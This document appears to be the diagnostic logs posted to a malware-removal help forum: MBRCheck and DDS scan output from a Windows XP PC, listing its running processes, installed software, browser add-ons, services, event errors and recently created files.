    2272 C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    2332 C:\Program Files\iPod\bin\iPodService.exe
    2528 C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
    2808 alg.exe
    1556 C:\WINDOWS\system32\wuauclt.exe
    236 C:\WINDOWS\system32\mshta.exe
    2952 C:\FIX THIS PC\procexp.exe
    964 C:\WINDOWS\system32\mshta.exe
    628 C:\Program Files\Mozilla Firefox\firefox.exe
    3848 C:\WINDOWS\system32\svchost.exe
    448 C:\Program Files\Mozilla Firefox\plugin-container.exe
    3328 C:\WINDOWS\system32\mshta.exe
    3536 C:\WINDOWS\system32\mshta.exe
    3896 C:\WINDOWS\system32\mshta.exe
    2284 C:\WINDOWS\system32\mshta.exe
    3624 C:\WINDOWS\system32\mshta.exe
    3176 C:\FIX THIS PC\BBS\MBR Check\MBRCheck.exe

    \\.\C: --> \\.\PhysicalDrive0 at offset 0x00000000`00007e00 (NTFS)

    PhysicalDrive0 Model Number: ST3250310AS, Rev: 3.AAA

    Size Device Name MBR Status
    --------------------------------------------
    232 GB \\.\PhysicalDrive0 Windows XP MBR code detected
    SHA1: DA38B874B7713D1B51CBC449F4EF809B0DEC644A


    Done!

    UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
    IF REQUESTED, ZIP IT UP & ATTACH IT

    DDS (Ver_10-12-05.01)

    Microsoft Windows XP Professional
    Boot Device: \Device\HarddiskVolume1
    Install Date: 1/12/2010 2:38:16 PM
    System Uptime: 5/12/2010 2:45:44 PM (7 hours ago)

    Motherboard: Gigabyte Technology Co., Ltd. | | GA-73PVM-S2H
    Processor: Intel Pentium III Xeon processor | Socket 775 | 2500/200mhz
    Processor: Intel Pentium III Xeon processor | Socket 775 | 2500/200mhz

    ==== Disk Partitions =========================

    C: is FIXED (NTFS) - 233 GiB total, 96.205 GiB free.
    D: is CDROM ()
    E: is CDROM (CDFS)

    ==== Disabled Device Manager Items =============

    ==== System Restore Points ===================

    RP1: 1/12/2010 3:02:19 PM - System Checkpoint
    RP2: 3/12/2010 3:06:55 PM - System Checkpoint
    RP3: 4/12/2010 2:45:52 PM - Removed iTunes
    RP4: 4/12/2010 2:55:32 PM - Removed Apple Application Support
    RP5: 4/12/2010 2:57:08 PM - Installed iTunes
    RP6: 4/12/2010 3:06:48 PM - Removed Star Wars Battlefront II
    RP7: 4/12/2010 4:31:57 PM - Installed League of Legends
    RP8: 4/12/2010 5:35:35 PM - Removed Zune Desktop Theme
    RP9: 5/12/2010 11:38:10 AM - Software Distribution Service 3.0
    RP10: 5/12/2010 1:46:47 PM - Software Distribution Service 3.0
    RP11: 5/12/2010 1:57:03 PM - Software Distribution Service 3.0
    RP12: 5/12/2010 1:59:16 PM - Software Distribution Service 3.0

    ==== Installed Programs ======================


    Adobe Anchor Service CS4
    Adobe Bridge CS4
    Adobe CMaps CS4
    Adobe Color - Photoshop Specific CS4
    Adobe Color EU Extra Settings CS4
    Adobe Color JA Extra Settings CS4
    Adobe Color NA Recommended Settings CS4
    Adobe Color Video Profiles CS CS4
    Adobe CSI CS4
    Adobe Default Language CS4
    Adobe ExtendScript Toolkit CS4
    Adobe Flash Player 10 Plugin
    Adobe Fonts All
    Adobe Linguistics CS4
    Adobe Output Module
    Adobe PDF Library Files CS4
    Adobe Photoshop CS4
    Adobe Photoshop CS4 Support
    Adobe Reader 9.4.1
    Adobe Search for Help
    Adobe Service Manager Extension
    Adobe Setup
    Adobe Type Support CS4
    Adobe Update Manager CS4
    Adobe WinSoft Linguistics Plugin
    Adobe XMP Panels CS4
    AdobeColorCommonSetCMYK
    AdobeColorCommonSetRGB
    Alien Swarm
    Any Video Converter 3.0.7
    Apple Application Support
    Apple Mobile Device Support
    Apple Software Update
    Audacity 1.2.6
    BitLord 1.1
    Bonjour
    CCleaner
    Connect
    Crysis WARHEAD(R)
    Crysis Wars(R)
    Crysis(R)
    erLT
    Fallout 3
    Game Booster
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
    Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
    Hotfix for Windows XP (KB935448)
    Hotfix for Windows XP (KB952287)
    Hotfix for Windows XP (KB961118)
    iTunes
    Java Auto Updater
    Java(TM) 6 Update 21
    K-Lite Codec Pack 5.8.3 (Full)
    kuler
    League of Legends
    Left 4 Dead
    Left 4 Dead 2
    Left 4 Dead Dedicated Server
    LightScribe 1.4.136.1
    Logitech SetPoint 6.20
    Macromedia Extension Manager
    Macromedia Flash 8
    Macromedia Flash 8 Video Encoder
    Malwarebytes' Anti-Malware
    McAfee SiteAdvisor
    Microsoft .NET Framework 2.0 Service Pack 2
    Microsoft .NET Framework 3.0 Service Pack 2
    Microsoft .NET Framework 3.5 SP1
    Microsoft .NET Framework 4 Client Profile
    Microsoft .NET Framework 4 Extended
    Microsoft Application Error Reporting
    Microsoft Choice Guard
    Microsoft Games for Windows - LIVE
    Microsoft Games for Windows - LIVE Redistributable
    Microsoft Halo
    Microsoft LifeChat
    Microsoft Office 2007 Service Pack 2 (SP2)
    Microsoft Office Access MUI (English) 2007
    Microsoft Office Access Setup Metadata MUI (English) 2007
    Microsoft Office Enterprise 2007
    Microsoft Office Excel MUI (English) 2007
    Microsoft Office Groove MUI (English) 2007
    Microsoft Office Groove Setup Metadata MUI (English) 2007
    Microsoft Office InfoPath MUI (English) 2007
    Microsoft Office Live Add-in 1.3
    Microsoft Office OneNote MUI (English) 2007
    Microsoft Office Outlook MUI (English) 2007
    Microsoft Office PowerPoint MUI (English) 2007
    Microsoft Office Proof (English) 2007
    Microsoft Office Proof (French) 2007
    Microsoft Office Proof (Spanish) 2007
    Microsoft Office Proofing (English) 2007
    Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
    Microsoft Office Publisher MUI (English) 2007
    Microsoft Office Shared MUI (English) 2007
    Microsoft Office Shared Setup Metadata MUI (English) 2007
    Microsoft Office Word MUI (English) 2007
    Microsoft Silverlight
    Microsoft Software Update for Web Folders (English) 12
    Microsoft SQL Server 2005 Compact Edition [ENU]
    Microsoft Visual C++ 2005 Redistributable
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
    Mozilla Firefox (3.6.12)
    Mplayer.com
    MSVCRT
    MSXML 4.0 SP2 (KB954430)
    MSXML 4.0 SP2 (KB973688)
    MSXML 4.0 SP2 Parser and SDK
    MSXML 6 Service Pack 2 (KB973686)
    Nero 7 Essentials
    NVIDIA Control Panel 260.99
    NVIDIA Drivers
    NVIDIA Graphics Driver 260.99
    NVIDIA HD Audio Driver 1.1.9.0
    NVIDIA Install Application
    NVIDIA nView 135.36
    NVIDIA nView Desktop Manager
    NVIDIA PhysX
    NVIDIA PhysX System Software 9.10.0514
    OGA Notifier 2.0.0048.0
    Pando Media Booster
    PDF Settings CS4
    PeerGuardian 2.0
    Photoshop Camera Raw
    Pocket Tanks
    PowerDVD
    PunkBuster Services
    QuickTime
    RealPlayer
    Realtek High Definition Audio Driver
    RealUpgrade 1.0
    RocketDock 1.3.5
    Security Update for 2007 Microsoft Office System (KB2288621)
    Security Update for 2007 Microsoft Office System (KB2289158)
    Security Update for 2007 Microsoft Office System (KB2344875)
    Security Update for 2007 Microsoft Office System (KB2345043)
    Security Update for 2007 Microsoft Office System (KB969559)
    Security Update for 2007 Microsoft Office System (KB976321)
    Security Update for CAPICOM (KB931906)
    Security Update for Microsoft .NET Framework 3.5 SP1 (KB2416473)
    Security Update for Microsoft .NET Framework 4 Extended (KB2416472)
    Security Update for Microsoft Office Access 2007 (KB979440)
    Security Update for Microsoft Office Excel 2007 (KB2345035)
    Security Update for Microsoft Office InfoPath 2007 (KB979441)
    Security Update for Microsoft Office Outlook 2007 (KB2288953)
    Security Update for Microsoft Office PowerPoint 2007 (KB982158)
    Security Update for Microsoft Office PowerPoint Viewer (KB2413381)
    Security Update for Microsoft Office Publisher 2007 (KB982124)
    Security Update for Microsoft Office system 2007 (972581)
    Security Update for Microsoft Office system 2007 (KB974234)
    Security Update for Microsoft Office Visio Viewer 2007 (KB973709)
    Security Update for Microsoft Office Word 2007 (KB2344993)
    Security Update for Windows Media Player (KB973540)
    Security Update for Windows Media Player (KB979402)
    Security Update for Windows XP (KB2229593)
    Security Update for Windows XP (KB923561)
    Security Update for Windows XP (KB923789)
    Security Update for Windows XP (KB941569)
    Security Update for Windows XP (KB944338-v2)
    Security Update for Windows XP (KB950762)
    Security Update for Windows XP (KB950974)
    Security Update for Windows XP (KB951376-v2)
    Security Update for Windows XP (KB951748)
    Security Update for Windows XP (KB952004)
    Security Update for Windows XP (KB952954)
    Security Update for Windows XP (KB955069)
    Security Update for Windows XP (KB956572)
    Security Update for Windows XP (KB956802)
    Security Update for Windows XP (KB956803)
    Security Update for Windows XP (KB956844)
    Security Update for Windows XP (KB958470)
    Security Update for Windows XP (KB958644)
    Security Update for Windows XP (KB958869)
    Security Update for Windows XP (KB959426)
    Security Update for Windows XP (KB960803)
    Security Update for Windows XP (KB960859)
    Security Update for Windows XP (KB961501)
    Security Update for Windows XP (KB969059)
    Security Update for Windows XP (KB970238)
    Security Update for Windows XP (KB971032)
    Security Update for Windows XP (KB971468)
    Security Update for Windows XP (KB971657)
    Security Update for Windows XP (KB971961)
    Security Update for Windows XP (KB972270)
    Security Update for Windows XP (KB973507)
    Security Update for Windows XP (KB973869)
    Security Update for Windows XP (KB973904)
    Security Update for Windows XP (KB974112)
    Security Update for Windows XP (KB974318)
    Security Update for Windows XP (KB974392)
    Security Update for Windows XP (KB974571)
    Security Update for Windows XP (KB975025)
    Security Update for Windows XP (KB975467)
    Security Update for Windows XP (KB975560)
    Security Update for Windows XP (KB975561)
    Security Update for Windows XP (KB975562)
    Security Update for Windows XP (KB977816)
    Security Update for Windows XP (KB977914)
    Security Update for Windows XP (KB978037)
    Security Update for Windows XP (KB978338)
    Security Update for Windows XP (KB978542)
    Security Update for Windows XP (KB978601)
    Security Update for Windows XP (KB978706)
    Security Update for Windows XP (KB979309)
    Security Update for Windows XP (KB979482)
    Security Update for Windows XP (KB979559)
    Security Update for Windows XP (KB979683)
    Security Update for Windows XP (KB980218)
    Security Update for Windows XP (KB980232)
    Security Update for Windows XP (KB981350)
    Security Update for Windows XP (KB982381)
    Segoe UI
    Skype Toolbars
    Skype™ 5.0
    StarCraft II
    Steam
    Suite Shared Configuration CS4
    TortoiseSVN 1.6.11.20210 (32 bit)
    Ubisoft Game Launcher
    Update for 2007 Microsoft Office System (KB967642)
    Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
    Update for Microsoft Office OneNote 2007 (KB980729)
    Update for Outlook 2007 Junk Email Filter (KB2443839)
    Update for Windows XP (KB925720)
    Update for Windows XP (KB955759)
    Update for Windows XP (KB961503)
    Update for Windows XP (KB967715)
    Update for Windows XP (KB968389)
    Update for Windows XP (KB973687)
    Update for Windows XP (KB973815)
    Vegas Pro 9.0
    Ventrilo Client
    WebFldrs XP
    Windows Genuine Advantage Notifications (KB905474)
    Windows Genuine Advantage Validation Tool (KB892130)
    Windows Live Call
    Windows Live Communications Platform
    Windows Live Device Manager
    Windows Live Essentials
    Windows Live Messenger
    Windows Live Photo Gallery
    Windows Live Sign-in Assistant
    Windows Live Sync
    Windows Live Upload Tool
    Windows Media Format 11 runtime
    Windows Media Format Runtime
    Windows Media Player 11
    Windows Presentation Foundation
    WinRAR archiver
    X-Mouse Button Control (32bit Version)
    Xilisoft MKV Converter
    XML Paper Specification Shared Components Pack 1.0
    Yahoo! Install Manager

    ==== Event Viewer Messages From Past Week ========

    4/12/2010 9:56:02 AM, error: Service Control Manager [7011] - Timeout (30000 milliseconds) waiting for a transaction response from the nvsvc service.
    4/12/2010 5:56:44 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the HTTP SSL service to connect.
    4/12/2010 5:56:44 PM, error: Service Control Manager [7000] - The HTTP SSL service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
    4/12/2010 4:51:18 PM, error: Service Control Manager [7032] - The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Management Instrumentation service, but this action failed with the following error: An instance of the service is already running.
    4/12/2010 2:52:40 PM, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: sptd
    4/12/2010 2:52:34 PM, error: sptd [4] - Driver detected an internal error in its data structures for .
    29/11/2010 3:57:48 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the IMAPI CD-Burning COM Service service to connect.
    29/11/2010 3:57:48 PM, error: Service Control Manager [7000] - The IMAPI CD-Burning COM Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
    2/12/2010 10:18:14 AM, error: Dhcp [1002] - The IP address lease 192.168.1.67 for the Network Card with network address 001FD0D8BABA has been denied by the DHCP server 192.168.1.1 (The DHCP Server sent a DHCPNACK message).
    1/12/2010 4:03:36 PM, error: Dhcp [1002] - The IP address lease 192.168.1.108 for the Network Card with network address 001FD0D8BABA has been denied by the DHCP server 192.168.1.1 (The DHCP Server sent a DHCPNACK message).
    1/12/2010 3:08:30 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the iPod Service service to connect.
    1/12/2010 3:08:30 PM, error: Service Control Manager [7000] - The iPod Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
    1/12/2010 3:08:17 PM, error: DCOM [10005] - DCOM got error "%1053" attempting to start the service iPod Service with arguments " " in order to run the server: {063D34A4-BF84-4B8D-B699-E8CA06504DDE}
    1/12/2010 2:40:42 PM, error: Setup [60055] - Windows Setup encountered non-fatal errors during installation. Please check the setuperr.log found in your Windows directory for more information.
    1/12/2010 2:35:34 PM, error: DCOM [10005] - DCOM got error "%1058" attempting to start the service SENS with arguments " " in order to run the server: {D3938AB0-5B9D-11D1-8DD2-00AA004ABD5E}

    ==== End Of File ===========================

    DDS (Ver_10-12-05.01) - NTFSx86
    Run by Marshall at 21:44:46.39 on Sun 05/12/2010
    Internet Explorer: 6.0.2900.2180 BrowserJavaVersion: 1.6.0_21
    Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.2046.1259 [GMT 11:00]


    ============== Running Processes ===============

    C:\WINDOWS\system32\nvsvc32.exe
    C:\WINDOWS\system32\svchost -k DcomLaunch
    svchost.exe
    C:\WINDOWS\System32\svchost.exe -k netsvcs
    svchost.exe
    svchost.exe
    C:\WINDOWS\System32\svchost.exe -k netsvcs
    C:\WINDOWS\system32\spoolsv.exe
    svchost.exe
    C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    C:\Program Files\Bonjour\mDNSResponder.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    C:\WINDOWS\system32\PnkBstrA.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe
    C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
    C:\Program Files\Logitech\SetPointP\SetPoint.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Microsoft LifeChat\LifeChat.exe
    C:\WINDOWS\system32\RUNDLL32.EXE
    C:\WINDOWS\RTHDCPL.EXE
    C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\RocketDock\RocketDock.exe
    C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
    C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
    C:\WINDOWS\system32\wuauclt.exe
    C:\WINDOWS\System32\mshta.exe
    C:\FIX THIS PC\procexp.exe
    C:\WINDOWS\System32\mshta.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\WINDOWS\System32\svchost.exe -k HTTPFilter
    C:\Program Files\Mozilla Firefox\plugin-container.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\System32\mshta.exe
    C:\WINDOWS\System32\mshta.exe
    C:\FIX THIS PC\BBS\DDS\dds.scr

    ============== Pseudo HJT Report ===============

    uStart Page = about:blank
    uInternet Settings,ProxyOverride = *.local
    uURLSearchHooks: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    BHO: {02478D38-C3F9-4efb-9B51-7695ECA05670} - No File
    BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
    BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - No File
    BHO: Groove GFS Browser Helper: {72853161-30c5-4d22-b7f9-0bbc1d38a37e} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll
    BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
    BHO: Skype Plug-In: {ae805869-2e5c-4ed4-8f7b-f1f7851a4497} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
    BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
    BHO: JQSIEStartDetectorImpl Class: {e7e6f031-17ce-4c07-bc86-eabfe594f69c} - c:\program files\java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    TB: {472734EA-242A-422B-ADF8-83D1E48CC825} - No File
    uRun: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "c:\program files\common files\ahead\lib\NMBgMonitor.exe "
    uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
    uRun: [RocketDock] "c:\program files\rocketdock\RocketDock.exe "
    uRun: [WindowsLivePhone] "c:\program files\windows live\device manager\msgrdvmn.exe" /AutoRun
    mRun: [AdobeCS4ServiceManager] "c:\program files\common files\adobe\cs4servicemanager\CS4ServiceManager.exe" -launchedbylogin
    mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe "
    mRun: [WindowsLivePhone] c:\program files\windows live\device manager\msgrdvmn.exe /AutoRun
    mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray
    mRun: [EvtMgr6] c:\program files\logitech\setpointp\SetPoint.exe /launchGaming
    mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe "
    mRun: [LifeChat] "c:\program files\microsoft lifechat\LifeChat.exe "
    mRun: [NvMediaCenter] RUNDLL32.EXE c:\windows\system32\NvMcTray.dll,NvTaskbarInit
    mRun: [NvCplDaemon] RUNDLL32.EXE c:\windows\system32\NvCpl.dll,NvStartup
    mRun: [nwiz] c:\program files\nvidia corporation\nview\nwiz.exe /installquiet
    mRun: [RTHDCPL] RTHDCPL.EXE
    dRun: [CTFMON.EXE] c:\windows\system32\CTFMON.EXE
    mPolicies-explorer: NoAutorun = 1 (0x1)
    IE: E&xport to Microsoft Excel - c:\progra~1\mi1933~1\office12\EXCEL.EXE/3000
    IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
    IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
    IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\progra~1\mi1933~1\office12\ONBttnIE.dll
    IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
    IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\mi1933~1\office12\REFIEBAR.DLL
    DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} - c:\program files\yahoo!\common\Yinsthelper.dll
    DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
    DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
    DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
    DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
    Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\program files\microsoft office\office12\GrooveSystemServices.dll
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
    Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
    Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
    Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
    SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
    SEH: Groove GFS Stub Execution Hook: {b5a7f190-dda6-4420-b3ba-52453494e6cd} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll

    ================= FIREFOX ===================

    FF - ProfilePath - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\
    FF - prefs.js: browser.startup.homepage - hxxp://www.houstontexans.com/news/calendar.html
    FF - component: c:\documents and settings\marshall\application data\mozilla\firefox\profiles\gga8nyz2.default\extensions\{340c2bbc-ce74-4362-90b5-7c26312808ef}\platform\winnt_x86-msvc\components\WeaveCrypto.dll
    FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
    FF - component: c:\program files\mozilla firefox\extensions\{ab2ce124-6272-4b12-94a9-7303c7397bd1}\components\SkypeFfComponent.dll
    FF - plugin: c:\documents and settings\all users\application data\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5videoshim.dll
    FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll
    FF - plugin: c:\program files\microsoft\office live\npOLW.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\npdeployJava1.dll
    FF - plugin: c:\program files\mozilla firefox\plugins\npyaxmpb.dll
    FF - plugin: c:\program files\pando networks\media booster\npPandoWebPlugin.dll
    FF - plugin: c:\program files\windows live\photo gallery\NPWLPG.dll
    FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\dotnetassistantextension\
    FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}
    FF - Extension: Default: {972ce4c6-7e08-4474-a285-3208198ce6fd} - c:\program files\mozilla firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
    FF - Extension: Skype extension: {AB2CE124-6272-4b12-94A9-7303C7397BD1} - c:\program files\mozilla firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1}
    FF - Extension: Java Console: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} - c:\program files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}
    FF - Extension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
    FF - Extension: Firefox Sync: {340c2bbc-ce74-4362-90b5-7c26312808ef} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{340c2bbc-ce74-4362-90b5-7c26312808ef}
    FF - Extension: StumbleUpon: {AE93811A-5C9A-4d34-8462-F7B864FC4696} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}
    FF - Extension: Password Exporter: {B17C1C5A-04B1-11DB-9804-B622A1EF5492} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{B17C1C5A-04B1-11DB-9804-B622A1EF5492}
    FF - Extension: Flash and Video Download: {bee6eb20-01e0-ebd1-da83-080329fb9a3a} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a}
    FF - Extension: DownThemAll!: {DDC359D1-844A-42a7-9AA1-88A850A938A8} - c:\docume~1\marshall\applic~1\mozilla\firefox\profiles\gga8nyz2.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}
    FF - Extension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\DotNetAssistantExtension
    FF - Extension: Java Quick Starter: jqs@sun.com - c:\program files\java\jre6\lib\deploy\jqs\ff
    FF - Extension: McAfee SiteAdvisor: {B7082FAA-CB62-4872-9106-E42DD88EDE45} - c:\program files\mcafee\SiteAdvisor

    ---- FIREFOX POLICIES ----
    FF - user.js: browser.cache.memory.capacity - 65536
    FF - user.js: browser.chrome.favicons - false
    FF - user.js: browser.display.show_image_placeholders - true
    FF - user.js: browser.turbo.enabled - true
    FF - user.js: browser.urlbar.autocomplete.enabled - true
    FF - user.js: browser.urlbar.autofill - true
    FF - user.js: browser.xul.error_pages.enabled - true
    FF - user.js: content.interrupt.parsing - true
    FF - user.js: content.max.tokenizing.time - 3000000
    FF - user.js: content.maxtextrun - 8191
    FF - user.js: content.notify.backoffcount - 5
    FF - user.js: content.notify.interval - 750000
    FF - user.js: content.notify.ontimer - true
    FF - user.js: content.switch.threshold - 750000
    FF - user.js: network.http.max-connections - 32
    FF - user.js: network.http.max-connections-per-server - 8
    FF - user.js: network.http.max-persistent-connections-per-proxy - 8
    FF - user.js: network.http.max-persistent-connections-per-server - 4
    FF - user.js: network.http.pipelining - true
    FF - user.js: network.http.pipelining.firstrequest - true
    FF - user.js: network.http.pipelining.maxrequests - 8
    FF - user.js: network.http.proxy.pipelining - true
    FF - user.js: network.http.request.max-start-delay - 0
    FF - user.js: nglayout.initialpaint.delay - 0
    FF - user.js: plugin.expose_full_path - true
    FF - user.js: ui.submenuDelay - 0

    ============= SERVICES / DRIVERS ===============

    R2 LBeepKE;Logitech Beep Suppression Driver;c:\windows\system32\drivers\LBeepKE.sys [2010-12-4 10448]
    R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-7-14 363344]
    R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2010-7-14 88176]
    R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-7-14 20952]
    R3 NVHDA;Service for NVIDIA High Definition Audio Driver;c:\windows\system32\drivers\nvhda32.sys [2007-11-10 100712]
    S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
    S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [2010-7-14 1691480]
    S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]

    =============== Created Last 30 ================

    2010-12-05 02:52:33 -------- d-----w- c:\program files\MSXML 6.0
    2010-12-05 00:44:28 -------- d-----w- c:\windows\ServicePackFiles
    2010-12-04 23:45:53 -------- d-----w- c:\docume~1\alluse~1\applic~1\Kaspersky Lab Setup Files
    2010-12-04 23:44:36 -------- d-----w- c:\windows\system32\CatRoot_bak
    2010-12-04 23:34:53 272128 -c----w- c:\windows\system32\dllcache\bthport.sys
    2010-12-04 23:32:10 454016 -c----w- c:\windows\system32\dllcache\mrxsmb.sys
    2010-12-04 23:30:18 2181376 -c----w- c:\windows\system32\dllcache\ntoskrnl.exe
    2010-12-04 23:30:18 2137088 -c----w- c:\windows\system32\dllcache\ntkrnlmp.exe
    2010-12-04 23:30:17 2058368 -c----w- c:\windows\system32\dllcache\ntkrnlpa.exe
    2010-12-04 23:30:17 2016768 -c----w- c:\windows\system32\dllcache\ntkrpamp.exe
    2010-12-04 08:54:09 -------- d-----w- C:\FIX THIS PC
    2010-12-04 08:23:35 -------- d-----w- c:\program files\Temp File Cleaner
